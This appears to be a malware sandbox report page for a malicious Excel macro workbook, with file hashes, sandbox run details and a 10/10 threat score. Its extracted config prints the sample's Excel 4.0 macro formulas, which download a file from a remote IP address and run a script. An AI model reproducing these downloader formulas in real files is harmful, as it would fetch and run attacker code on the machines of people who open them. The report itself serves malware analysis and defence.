d3fb02a307e584cd21ac98442df15b8a | Triage

Submit
Reports

Overview

overview

Static

static

d3fb02a307...a.xlsm

windows7-x64

d3fb02a307...a.xlsm

windows10-2004-x64

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

d3fb02a307e584cd21ac98442df15b8a.xlsm

Resource

win7-20231215-en

windows7-x64

7 signatures

150 seconds

Behavioral task

behavioral2

Sample

d3fb02a307e584cd21ac98442df15b8a.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

8 signatures

150 seconds

General

Target

d3fb02a307e584cd21ac98442df15b8a
Size

6KB
MD5

d3fb02a307e584cd21ac98442df15b8a
SHA1

e4fc033f72684406a44b505792fef236a73bf5d9
SHA256

dccca246c316046d7435a18c25baf967c36c8f8efd64c35c4de3ad37aa6d9e57
SHA512

d0aa2c42df7974d1a45d7e807c4aa8830b57cbf7ff543c31e9ec8570b6b60100725d5c520967146fce620cb1fc8207e1dbcf5c23974b9b03091ef94ba37284de
SSDEEP

192:NDSfuShbrA2OmmfRc8UhHFBFYuKb98yvp+8:NouyM2w61FYrb98yvt

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes

formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

d3fb02a307e584cd21ac98442df15b8a
.xlsm office2007

© 2018-2025

Terms | Privacy